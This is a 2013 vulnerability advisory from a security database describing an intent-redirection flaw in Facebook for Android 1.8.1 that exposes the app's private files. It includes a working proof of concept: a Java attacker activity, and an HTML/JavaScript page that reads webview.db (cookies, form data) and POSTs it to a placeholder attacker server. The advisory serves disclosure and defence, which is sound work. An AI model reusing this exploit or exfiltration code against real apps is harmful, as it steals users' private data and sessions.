Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28943
HistoryJan 10, 2013 - 12:00 a.m.

Facebook for Android - Information Diclosure Vulnerability

2013-01-1000:00:00
vulners.com
31
JSON

Title: Facebook for Android - Information Diclosure Vulnerability
Affected Software: Facebook Application 1.8.1 for Android
(Confirmed on Android 2.2)
Credit: Takeshi Terada
Issue Status: v1.8.2 was released which fixes this vulnerability

Overview:
The LoginActivity of Facebook app has improper intent handling flaw.
The flaw enables malicious apps to steal Facebook app's private files.

Details:
LoginActivity of Facebook app is "exported" to other apps. When
the activity is called and the user is logged-in to Facebook, the
activity pulls out an intent named "continuation_intent" from the
extra data of the incoming intent. Then LoginActivity launches
another activity by using continuation_intent.

This behavior is dangerous because the actions described in the
intent (continuation_intent) given by other apps is performed
in the context (permission and identity) of Facebook app.

This enables attacker's apps to call (and attack) Facebook app's
private (not "exported") activities, by using LoginActivity as a
stepping-stone.

[Example of attack targeting FacebookWebViewActivity]

FacebookWebViewActivity reads an URL string from incoming intent's
extra data, and loads the URL into its JavaScript-enabled WebView.

FacebookWebViewActivity itself is not "exported" to other apps,
so attacker's app cannot directy call it. But attacker's app can
leverage the LoginActivity's flaw to relay a malicious intent to
FacebookWebViewActivity, so that the activity loads an attacker-
supplied URL into its WebView.

In general, when an URL beginning with "file:///" is loaded in a
WebView, the loaded page works in "Local Zone". "Local Zone" means
that JavaScript in the page can read other local files, to which the
WebView's owner process has read permission. XHR or so can be used
to read other local files. Thus the victim app's private files are
to be disclosed to the attacker, if the attacker's app succeeds to
inject an URL of attacker-supplied local HTML file into the victim
app's WebView.

By using the method described above, attacker's app can get Facebook
app's private files such as files under /data/data/com.facebook.katana/
directory.

For more specific information, see the PoC code.

Proof of Concept:
++++++ Attacker's app (activity) ++++++

// notice: for a successful attack, the victim user must be logged-in
// to Facebook in advance.
public class AttackFacebook extends Activity {

  // package name of Facebook app
  static final String FB_PKG = "com.facebook.katana";

  // LoginActivity of Facebook app
  static final String FB_LOGIN_ACTIVITY
       = FB_PKG + ".LoginActivity";

  // FacebookWebViewActivity of Facebook app
  static final String FB_WEBVIEW_ACTIVITY
       = FB_PKG + ".view.FacebookWebViewActivity";

  @Override
  public void onCreate(Bundle bundle) {
      super.onCreate(bundle);
      attack();
  }

  // main method
  public void attack() {
      // create continuation_intent to call FacebookWebViewActivity.
      Intent contIntent = new Intent();
      contIntent.setClassName(FB_PKG, FB_WEBVIEW_ACTIVITY);
      // URL pointing to malicious local file.
      // FacebookWebViewActivity will load this URL into its WebView.
      contIntent.putExtra("url", "file:///sdcard/attack.html");

      // create intent to be sent to LoginActivity.
      Intent intent = new Intent();
      intent.setClassName(FB_PKG, FB_LOGIN_ACTIVITY);
      intent.putExtra("login_redirect", false);

      // put continuation_intent into extra data of the intent.
      intent.putExtra(FB_PKG + ".continuation_intent", contIntent);

      // call LoginActivity
      this.startActivity(intent);
  }

}

++++++ Attacker's HTML/JavaScript file ++++++

<!–
attacker's app should put this file to /sdcard/attack.html in advance
–>
<html>
<body onload="doAttack()">
<h1>attack.html</h1>
<script>
// file path to steal. webview.db can be a good target for attackers
// because it contains cookies, formdata etc.
var target = "file:///data/data/com.facebook.katana/databases/webview.db";

// get the contents of the target file by XHR
function doAttack() {
var xhr1 = new XMLHttpRequest();
xhr1.overrideMimeType("text/plain; charset=iso-8859-1");
xhr1.open("GET", target);
xhr1.onreadystatechange = function() {
if (xhr1.readyState == 4) {
var content = xhr1.responseText;
// send the content of the file to attacker's server
sendFileToAttackerServer(content);
// for debug
document.body.appendChild(document.createTextNode(content));
}
};
xhr1.send();
}

// Send the content of target file to the attacker's server
function sendFileToAttackerServer(content) {
var xhr2 = new XMLHttpRequest();
xhr2.open("POST", "http://www.example.jp/&quot;&#41;;
xhr2.send(encodeURIComponent(content));
}
</script>
</body>
</html>

Note:

  1. Android framework provides "PendingIntent" mechanism to safely
    perform the actions of an intent given by untrusted apps.
    In some situations, it can be a good measure for this kind of vulns.

  2. Security of WebViews was improved in Android 4.1, so that attacks
    abusing WebViews may not work in apps built for recent versions
    of Android.

  3. The issue in this advisory was fixed almost a year ago. But I think
    the issue is quite unique and is interesting for Android security
    researchers, so I decided to disclose this old issue here.

Timeline:
2012/01/21 Reported to vender
2012/02/02 Vender released fixed version (v1.8.2)
2013/01/07 Disclosure of this advisory

Recommendation:
Upgrade to the latest version.

JSON